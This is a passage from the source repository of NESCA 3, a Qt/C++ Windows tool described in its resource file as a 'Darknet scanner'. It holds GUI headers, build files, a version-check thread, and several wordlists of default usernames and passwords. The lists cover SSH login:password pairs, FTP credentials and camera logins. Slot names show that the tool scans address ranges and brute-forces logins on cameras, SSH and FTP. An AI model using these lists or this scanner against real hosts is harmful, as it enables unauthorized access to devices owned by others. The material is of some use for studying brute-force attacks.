isWM, QWidget *parent); 46 | ~nesca_3(); 47 | 48 | void ConnectEvrthng(); 49 | // void ChangeLabelIpRange_Value(QString str); 50 | // void ChangeLabelIPS_Value(QString str); 51 | // void newListItem(QString str); 52 | static int addBARow(QString ip, QString loginPass, QString percentage); 53 | bool etEventFilter(QObject* object, QEvent* event); 54 | public: 55 | static int perc; 56 | static int savedTabIndex; 57 | protected: 58 | bool eventFilter(QObject* obj, QEvent *event); 59 | void run(); 60 | 61 | QString GetSSLContent(QString str); 62 | void SSLConnect(QString str); 63 | protected slots: 64 | void saveTLD(QString str); 65 | void onLinkClicked(QUrl); 66 | void MaxBrutingThr_ChangeValue(QString str); 67 | void ThreadDelay_ChangeValue(QString val); 68 | void ChangePingerOK(bool val); 69 | void changeNSTrackLabel(bool status); 70 | void DNSLine_ValueChanged(); 71 | void slotShowRedVersion(); 72 | void slotTabChanged(int index); 73 | void IPScanSeq(); 74 | void DNSScanSeq(); 75 | void ImportScanSeq(); 76 | void smReaction(); 77 | void slotShowDataflow(); 78 | void slotOutData(QString str); 79 | void slotIncData(QString ip, QString str); 80 | void slotShowServerMsg(QString str); 81 | void slotSaveImage(QAction *qwe); 82 | void slotUpdatePie(); 83 | void slotClearLogs(); 84 | void slotDrawVoiceGrid(int factor); 85 | void slotDrawTextPlacers(); 86 | // void CheckPersKey(); 87 | // bool CheckPersKeyMain(); 88 | void slotRestoreDefPorts(); 89 | void switchToJobMode(); 90 | void switchDataFields(); 91 | void importAndScan(); 92 | void slotQoSAddGrid(); 93 | void slotVoiceAddLine(); 94 | void slotDrawDelimLines(); 95 | void slotDrawActivityLine(QString data); 96 | void slotDrawActivityGrid(); 97 | void activateME2ScanScene(); 98 | void activateQoSScanBut(); 99 | void activateVoiceScanBut(); 100 | void activatePieStatBut(); 101 | void slotAddPolyLine(); 102 | void slotQoSAddLine(); 103 | void slotAddLine(int x1, int y1, int x2, int y2); 104 | void slotDrawGrid(); 105 | void exitButtonClicked(); 106 | void trayButtonClicked(); 107 | void mouseMoveEvent(QMouseEvent * event); 108 | void mousePressEvent(QMouseEvent *event); 109 | void mouseReleaseEvent(QMouseEvent *event); 110 | void logoLabelClicked(); 111 | void startScanButtonClicked(); 112 | void startScanButtonClickedDNS(); 113 | void saveOptions(); 114 | void ChangeTrackerOK(bool val); 115 | void ChangeShuffle(bool val); 116 | void ChangeLabelThreads_ValueChanged(QString); 117 | void PingTO_ChangeValue(QString); 118 | void ChangeLabelTO_ValueChanged(QString); 119 | void appendErrText(QString str); 120 | void appendOKText(QString str); 121 | void appendTextCustom(QString str, QString color); 122 | void appendDebugText(QString str); 123 | void appendNotifyText(QString str); 124 | void appendDefaultText(QString str); 125 | void STTTerminate(); 126 | void drawVerboseArcs(unsigned long gTargets); 127 | void finishLoading(); 128 | void slotBlockButtons(bool value); 129 | //BA TablelistView 130 | void slotChangeBARow(const int index, const QString loginPass, const QString percentage); 131 | void slotEditFilter(); 132 | 133 | private: 134 | QPoint dragPosition; 135 | }; 136 | class PieStatView : public QGraphicsView 137 | { 138 | Q_OBJECT 139 | public: 140 | PieStatView(QWidget *parent = 0) : QGraphicsView(parent) {}; 141 | public: 142 | void contextMenuEvent(QContextMenuEvent *event); 143 | }; 144 | 145 | class PekoWidget : public QWidget 146 | { 147 | Q_OBJECT; 148 | public: 149 | static int m_xPos; 150 | static int m_yPos; 151 | static int m_windowCounter; 152 | static int offset; 153 | 154 | PekoWidget(QWidget *parent = 0) : QWidget(parent) 155 | { 156 | } 157 | PekoWidget(const int qmwXPos, const int qmwYPos, QWidget *parent = 0) : QWidget(parent) 158 | { 159 | offset = 5; 160 | setWindowFlags(Qt::FramelessWindowHint | Qt::SubWindow); 161 | installEventFilter(this); 162 | setStyleSheet( 163 | "background-color:qlineargradient(spread:pad, x1:0.541, y1:0.500364, x2:0.54, y2:0, stop:0 rgba(16, 16, 16, 255), stop:1 rgba(0, 0, 0, 255));"); 164 | 165 | if (m_xPos >= 1200) { 166 | m_xPos = 305; 167 | offset += 5; 168 | } 169 | setGeometry(qmwXPos - m_xPos, qmwYPos + m_yPos, 300, 200); 170 | if (m_windowCounter++ < 3) { 171 | m_yPos += 200 + offset; 172 | } 173 | else { 174 | m_windowCounter = 0; 175 | m_xPos += 305; 176 | m_yPos = 0; 177 | } 178 | }; 179 | protected slots: 180 | void pekoExitButtonClicked(); 181 | protected: 182 | bool switchWindows; 183 | void paintEvent(QPaintEvent *e) 184 | { 185 | QPainter painter(this); 186 | painter.setPen(QColor(255, 255, 255, 60)); 187 | painter.drawRoundedRect(0, 0, width() - 1, height() - 1, 0, 1); 188 | QWidget::paintEvent(e); 189 | 190 | } 191 | void mousePressEvent(QMouseEvent *evt) 192 | { 193 | switchWindows = false; 194 | if (evt->button() == Qt::LeftButton) 195 | { 196 | switchWindows = true; 197 | oldPos = evt->globalPos(); 198 | evt->accept(); 199 | } 200 | else if (evt->button() == Qt::RightButton) 201 | { 202 | ui->newMessageLabel->setStyleSheet("color:rgba(255, 0, 0, 0);background-color: rgba(2, 2, 2, 0);"); 203 | this->close(); 204 | }; 205 | } 206 | void mouseMoveEvent(QMouseEvent *evt) 207 | { 208 | switchWindows = false; 209 | const QPoint delta = evt->globalPos() - oldPos; 210 | move(x() + delta.x(), y() + delta.y()); 211 | oldPos = evt->globalPos(); 212 | } 213 | void mouseReleaseEvent() 214 | { 215 | if (switchWindows) 216 | { 217 | switchWindows = false; 218 | }; 219 | } 220 | 221 | private: 222 | QPoint oldPos; 223 | }; 224 | 225 | class PopupMsgWidget : public QWidget 226 | { 227 | Q_OBJECT 228 | public: 229 | PopupMsgWidget(QWidget* parent = 0) : QWidget(parent) 230 | { }; 231 | 232 | public: signals: void clicked(bool checked = false); 233 | protected: 234 | bool switchWindows; 235 | void mousePressEvent(QMouseEvent *evt) 236 | { 237 | switchWindows = false; 238 | if (evt->button() == Qt::LeftButton) 239 | { 240 | switchWindows = true; 241 | oldPos = evt->globalPos(); 242 | evt->accept(); 243 | } 244 | else if (evt->button() == Qt::RightButton) 245 | { 246 | ui->newMessageLabel->setStyleSheet("color:rgba(255, 0, 0, 0);background-color: rgba(2, 2, 2, 0);"); 247 | this->hide(); 248 | }; 249 | } 250 | void mouseMoveEvent(QMouseEvent *evt) 251 | { 252 | switchWindows = false; 253 | const QPoint delta = evt->globalPos() - oldPos; 254 | move(x()+delta.x(), y()+delta.y()); 255 | oldPos = evt->globalPos(); 256 | } 257 | void mouseReleaseEvent() 258 | { 259 | if(switchWindows) 260 | { 261 | switchWindows = false; 262 | }; 263 | } 264 | 265 | private: 266 | QPoint oldPos; 267 | }; 268 | 269 | #endif // nesca_3_H 270 | 271 | -------------------------------------------------------------------------------- /nesca_3.pro: -------------------------------------------------------------------------------- 1 | # ---------------------------------------------------- 2 | # This file is generated by the Qt Visual Studio Add-in. 3 | # ------------------------------------------------------ 4 | 5 | TEMPLATE = app 6 | TARGET = nesca_3 7 | DESTDIR = ../Win32/Debug 8 | QT += core multimedia widgets gui qml 9 | CONFIG += debug 10 | DEFINES += QT_DLL QT_WIDGETS_LIB QT_QML_LIB 11 | INCLUDEPATH += ./GeneratedFiles \ 12 | $(QTDIR)/bin \ 13 | ./GeneratedFiles/Debug 14 | LIBS += -L"$(QTDIR)/msvc2013/lib" \ 15 | -lZ:/libssh/lib/ssh \ 16 | -lwsock32 \ 17 | -lZ:/hikvision_sdk/lib/HCNetSDK 18 | DEPENDPATH += . 19 | MOC_DIR += ./GeneratedFiles/debug 20 | OBJECTS_DIR += debug 21 | UI_DIR += ./GeneratedFiles 22 | RCC_DIR += ./GeneratedFiles 23 | include(Z:/Main2/nesca_3.pri) 24 | win32:RC_FILE = nesca_3.rc 25 | -------------------------------------------------------------------------------- /nesca_3.qrc: -------------------------------------------------------------------------------- 1 | 2 | 3 | small_font.ttf 4 | nesca.ico 5 | 6 | 7 | -------------------------------------------------------------------------------- /nesca_3.rc: -------------------------------------------------------------------------------- 1 | // Microsoft Visual C++ generated resource script. 2 | // 3 | #include "resource.h" 4 | 5 | #define APSTUDIO_READONLY_SYMBOLS 6 | ///////////////////////////////////////////////////////////////////////////// 7 | // 8 | // Generated from the TEXTINCLUDE 2 resource. 9 | // 10 | #include "afxres.h" 11 | 12 | ///////////////////////////////////////////////////////////////////////////// 13 | #undef APSTUDIO_READONLY_SYMBOLS 14 | 15 | ///////////////////////////////////////////////////////////////////////////// 16 | // Russian (Russia) resources 17 | 18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_RUS) 19 | LANGUAGE LANG_RUSSIAN, SUBLANG_DEFAULT 20 | 21 | #ifdef APSTUDIO_INVOKED 22 | ///////////////////////////////////////////////////////////////////////////// 23 | // 24 | // TEXTINCLUDE 25 | // 26 | 27 | 1 TEXTINCLUDE 28 | BEGIN 29 | "resource.h\0" 30 | END 31 | 32 | 2 TEXTINCLUDE 33 | BEGIN 34 | "#include ""afxres.h""\r\n" 35 | "\0" 36 | END 37 | 38 | 3 TEXTINCLUDE 39 | BEGIN 40 | "\r\n" 41 | "\0" 42 | END 43 | 44 | #endif // APSTUDIO_INVOKED 45 | 46 | 47 | ///////////////////////////////////////////////////////////////////////////// 48 | // 49 | // Icon 50 | // 51 | 52 | // Icon with lowest ID value placed first to ensure application icon 53 | // remains consistent on all systems. 54 | IDI_ICON1 ICON "Z:\\nesca.ico" 55 | 56 | ///////////////////////////////////////////////////////////////////////////// 57 | // 58 | // Version 59 | // 60 | 61 | VS_VERSION_INFO VERSIONINFO 62 | FILEVERSION 3,2,0,2 63 | PRODUCTVERSION 3,2,0,2 64 | FILEFLAGSMASK 0x3fL 65 | #ifdef _DEBUG 66 | FILEFLAGS 0x1L 67 | #else 68 | FILEFLAGS 0x0L 69 | #endif 70 | FILEOS 0x0L 71 | FILETYPE 0x0L 72 | FILESUBTYPE 0x0L 73 | BEGIN 74 | BLOCK "StringFileInfo" 75 | BEGIN 76 | BLOCK "000904b0" 77 | BEGIN 78 | VALUE "CompanyName", "ISKOPASI" 79 | VALUE "FileDescription", "Darknet scanner" 80 | VALUE "FileVersion", "" 81 | VALUE "InternalName", "nesca_3.exe" 82 | VALUE "LegalCopyright", "" 83 | VALUE "OriginalFilename", "nesca_3.exe" 84 | VALUE "ProductName", "NESCA3" 85 | VALUE "ProductVersion", "3.2.0.2" 86 | END 87 | END 88 | BLOCK "VarFileInfo" 89 | BEGIN 90 | VALUE "Translation", 0x9, 1200 91 | END 92 | END 93 | 94 | #endif // Russian (Russia) resources 95 | ///////////////////////////////////////////////////////////////////////////// 96 | 97 | 98 | 99 | #ifndef APSTUDIO_INVOKED 100 | ///////////////////////////////////////////////////////////////////////////// 101 | // 102 | // Generated from the TEXTINCLUDE 3 resource. 103 | // 104 | 105 | 106 | ///////////////////////////////////////////////////////////////////////////// 107 | #endif // not APSTUDIO_INVOKED 108 | 109 | -------------------------------------------------------------------------------- /nesca_3.ruleset: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 272 | 273 | 274 | 275 | 276 | 277 | 278 | 279 | 280 | 281 | 282 | 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | 306 | 307 | 308 | 309 | 310 | 311 | 312 | 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 334 | 335 | 336 | 337 | 338 | 339 | 340 | 341 | 342 | 343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | 356 | 357 | -------------------------------------------------------------------------------- /pass.txt: -------------------------------------------------------------------------------- 1 | 12345 2 | root 3 | admin 4 | password 5 | 123456 6 | 1234 7 | 8 | 9 | 123123 10 | pass 11 | qwerty 12 | meinsm 13 | monitor 14 | user 15 | support 16 | test 17 | sysadm 18 | admin123 19 | Admin 20 | 123321 21 | 12344321 22 | toor 23 | qwerty123 24 | 1q2w3e4r 25 | 987654321 26 | system 27 | 111111 28 | 1111 29 | 654321 30 | 54321 31 | !@#$%^ 32 | 0000 33 | 000000 34 | master 35 | 12345678 36 | 666666 37 | 888888 38 | 88888888 39 | 777777 40 | 555555 41 | 123321123 42 | 222222 43 | 333333 44 | 444444 45 | 999999 46 | 111222333 47 | 123123123 48 | 123454321 49 | 0123456789 50 | qqqqqq 51 | administrator 52 | backup 53 | super 54 | ubnt -------------------------------------------------------------------------------- /piestat.cpp: -------------------------------------------------------------------------------- 1 | #include "piestat.h" 2 | #include "externData.h" 3 | 4 | void PieStat::doEmitUpdatePie() 5 | { 6 | emit psTh->sUpdatePie(); 7 | }; 8 | 9 | void PieStat::run() 10 | { 11 | while(PieStatFlag) 12 | { 13 | psTh->doEmitUpdatePie(); 14 | camerasC1 = 0; 15 | //WF = 0; 16 | baCount = 0; 17 | filtered = 0; 18 | Overl = 0; 19 | //Lowl = 0; 20 | Alive = 0; 21 | other = 0; 22 | ssh = 0; 23 | msleep(500); 24 | }; 25 | }; 26 | -------------------------------------------------------------------------------- /piestat.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef PIESTAT_H 3 | #define PIESTAT_H 4 | 5 | #include "nesca_3.h" 6 | 7 | class PieStat : public QThread 8 | { 9 | Q_OBJECT 10 | 11 | public: 12 | public: signals: void sUpdatePie(); 13 | 14 | public: 15 | void doEmitUpdatePie(); 16 | protected: 17 | void run(); 18 | }; 19 | extern PieStat *psTh; 20 | 21 | #endif // PIESTAT_H 22 | -------------------------------------------------------------------------------- /progressbardrawer.cpp: -------------------------------------------------------------------------------- 1 | #include "progressbardrawer.h" 2 | #include "externData.h" 3 | 4 | ProgressbarDrawer *pbTh; 5 | 6 | void ProgressbarDrawer::update() 7 | { 8 | emit pbTh->upd(); 9 | }; 10 | 11 | int nesca_3::perc = 0; 12 | void ProgressbarDrawer::run() 13 | { 14 | globalScanFlag = true; 15 | while(globalScanFlag) 16 | { 17 | msleep(1000); 18 | nesca_3::perc = (unsigned long)100*indexIP/(gTargetsNumber == 0 ? 1 : gTargetsNumber); 19 | update(); 20 | }; 21 | }; -------------------------------------------------------------------------------- /progressbardrawer.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef PROGRESSBARDRAWER_H 3 | #define PROGRESSBARDRAWER_H 4 | 5 | #include "nesca_3.h" 6 | 7 | class ProgressbarDrawer : public QThread 8 | { 9 | Q_OBJECT 10 | 11 | public: signals: void upd(); 12 | public: 13 | void update(); 14 | protected: 15 | void run(); 16 | }; 17 | extern ProgressbarDrawer *pbTh; 18 | 19 | #endif // PROGRESSBARDRAWER_H 20 | -------------------------------------------------------------------------------- /pwd_lists/ftplogin.txt: -------------------------------------------------------------------------------- 1 | admin 2 | root 3 | ftp 4 | anonymous -------------------------------------------------------------------------------- /pwd_lists/ftppass.txt: -------------------------------------------------------------------------------- 1 | 12345 2 | root 3 | admin 4 | password 5 | 123456 6 | 1234 7 | 8 | 9 | ftp 10 | 123123 11 | pass 12 | qwerty 13 | admin123 14 | 123321 15 | 12344321 16 | toor 17 | qwerty123 18 | 1q2w3e4r 19 | 987654321 20 | 111111 21 | 1111 22 | 654321 23 | !@#$%^ 24 | 0000 25 | 000000 26 | 12345678 27 | 666666 28 | 888888 29 | 777777 30 | 555555 31 | 111222333 32 | 123123123 33 | 123454321 34 | 0123456789 35 | guest 36 | backup -------------------------------------------------------------------------------- /pwd_lists/login.txt: -------------------------------------------------------------------------------- 1 | admin 2 | root 3 | 123123 4 | 123456 5 | 12345 6 | 7 | 8 | cisco 9 | super 10 | meinsm 11 | monitor 12 | test 13 | support 14 | 1234 15 | administrator 16 | qwerty 17 | recovery 18 | system 19 | naadmin 20 | master 21 | guest 22 | backup 23 | 0000 24 | 1111 25 | 123321 26 | 123321123 27 | 111111 28 | 222222 29 | 333333 30 | 444444 31 | 666666 32 | 888888 33 | 88888888 34 | 999999 35 | 777777 36 | 555555 37 | 111222333 -------------------------------------------------------------------------------- /pwd_lists/negatives.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netstalking-core/nesca/469cdcb04cd1a7130a56974b1c85961b88b8eecc/pwd_lists/negatives.txt -------------------------------------------------------------------------------- /pwd_lists/pass.txt: -------------------------------------------------------------------------------- 1 | 12345 2 | root 3 | admin 4 | password 5 | 123456 6 | 1234 7 | 8 | 9 | 123123 10 | pass 11 | qwerty 12 | meinsm 13 | monitor 14 | user 15 | support 16 | test 17 | sysadm 18 | admin123 19 | Admin 20 | 123321 21 | 12344321 22 | toor 23 | qwerty123 24 | 1q2w3e4r 25 | 987654321 26 | system 27 | 111111 28 | 1111 29 | 654321 30 | 54321 31 | !@#$%^ 32 | 0000 33 | 000000 34 | master 35 | 12345678 36 | 87654321 37 | 666666 38 | 888888 39 | 88888888 40 | 777777 41 | 555555 42 | 123321123 43 | 222222 44 | 333333 45 | 444444 46 | 999999 47 | 111222333 48 | 123123123 49 | 123454321 50 | 0123456789 51 | qqqqqq 52 | administrator 53 | backup 54 | super 55 | ubnt -------------------------------------------------------------------------------- /pwd_lists/sshpass.txt: -------------------------------------------------------------------------------- 1 | hw230f8034t:17932yhf823 2 | admin: 3 | root:root 4 | root:admin 5 | admin:admin 6 | admin:root 7 | backup:backup 8 | guest:guest 9 | root:master 10 | root:1234 11 | admin:master 12 | admin:111111 13 | root:12345 14 | root:123456 15 | admin:1234 16 | admin:12345 17 | root:12345678 18 | root:123123 19 | admin:123456 20 | admin:12345678 21 | root:654321 22 | admin:123123 23 | admin:654321 24 | root:password 25 | admin:pasword 26 | root:1qazXSW@ 27 | test:test 28 | : 29 | user:user -------------------------------------------------------------------------------- /pwd_lists/wflogin.txt: -------------------------------------------------------------------------------- 1 | [FAIL] 2 | admin 3 | root -------------------------------------------------------------------------------- /pwd_lists/wfpass.txt: -------------------------------------------------------------------------------- 1 | [FAIL] 2 | admin 3 | root 4 | pass 5 | password 6 | toor 7 | 123123 8 | 123456 9 | 12345 10 | qwerty -------------------------------------------------------------------------------- /resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by nesca_3.rc 4 | // 5 | #define MAX_ADDR_LEN 128 6 | #define TITLE_MAX_SIZE 512 7 | #define COOKIE_MAX_SIZE 1024 8 | 9 | // Next default values for new objects 10 | // 11 | #ifdef APSTUDIO_INVOKED 12 | #ifndef APSTUDIO_READONLY_SYMBOLS 13 | #define _APS_NEXT_RESOURCE_VALUE 101 14 | #define _APS_NEXT_COMMAND_VALUE 40001 15 | #define _APS_NEXT_CONTROL_VALUE 1000 16 | #define _APS_NEXT_SYMED_VALUE 101 17 | #endif 18 | #endif 19 | -------------------------------------------------------------------------------- /small_font.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netstalking-core/nesca/469cdcb04cd1a7130a56974b1c85961b88b8eecc/small_font.ttf -------------------------------------------------------------------------------- /sshpass.txt: -------------------------------------------------------------------------------- 1 | hw230f8034t:17932yhf823 2 | admin: 3 | root:root 4 | root:admin 5 | admin:admin 6 | admin:root 7 | backup:backup 8 | guest:guest 9 | root:master 10 | root:1234 11 | admin:master 12 | admin:111111 13 | root:12345 14 | root:123456 15 | admin:1234 16 | admin:12345 17 | root:12345678 18 | root:123123 19 | admin:123456 20 | admin:12345678 21 | root:654321 22 | admin:123123 23 | admin:654321 24 | root:password 25 | admin:pasword 26 | root:1qazXSW@ 27 | test:test 28 | : 29 | user:user -------------------------------------------------------------------------------- /vercheckerthread.cpp: -------------------------------------------------------------------------------- 1 | #include "vercheckerthread.h" 2 | #include "externData.h" 3 | #include "mainResources.h" 4 | #include "Connector.h" 5 | #include "Utils.h" 6 | 7 | void _checkVer() 8 | { 9 | while(true) { 10 | const char request[64] = {"http://nesca.d3w.org/version"}; 11 | std::string buffer; 12 | std::vector headerVector{ "X-Nescav3: True" }; 13 | Connector con; 14 | con.nConnect(request, 80, &buffer, NULL, &headerVector); 15 | 16 | char *ptr1 = NULL; 17 | if(buffer.size() > 0) 18 | { 19 | if(Utils::ustrstr(buffer, std::string("\r\n\r\n")) != -1) 20 | { 21 | ptr1 = strstr((char*)buffer.c_str(), "\r\n\r\n"); 22 | if(strcmp(gVER, ptr1 + 4) != 0) 23 | { 24 | stt->doEmitionFoundData("
======Update required======
Latest version: " + QString(ptr1 + 4) + 25 | "
Your version: " + QString(gVER) + "
========================="); 26 | stt->doEmitionShowRedVersion(); 27 | }; 28 | }; 29 | }; 30 | 31 | vct->sleep(600000); //10 min 32 | }; 33 | //vct->terminate(); 34 | } 35 | 36 | void VerCheckerThread::run() 37 | { 38 | _checkVer(); 39 | } 40 | -------------------------------------------------------------------------------- /vercheckerthread.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef VERCHECKERTHREAD_H 3 | #define VERCHECKERTHREAD_H 4 | 5 | #include "STh.h" 6 | 7 | class VerCheckerThread : public QThread 8 | { 9 | Q_OBJECT 10 | 11 | public: 12 | 13 | protected: 14 | void run(); 15 | }; 16 | 17 | extern VerCheckerThread *vct; 18 | #endif // VERCHECKERTHREAD_H 19 | -------------------------------------------------------------------------------- /version: -------------------------------------------------------------------------------- 1 | 27563-166 -------------------------------------------------------------------------------- /wflogin.txt: -------------------------------------------------------------------------------- 1 | [FAIL] 2 | admin 3 | root -------------------------------------------------------------------------------- /wfpass.txt: -------------------------------------------------------------------------------- 1 | [FAIL] 2 | admin 3 | root 4 | pass 5 | password 6 | toor 7 | 123123 8 | 123456 9 | 12345 10 | qwerty --------------------------------------------------------------------------------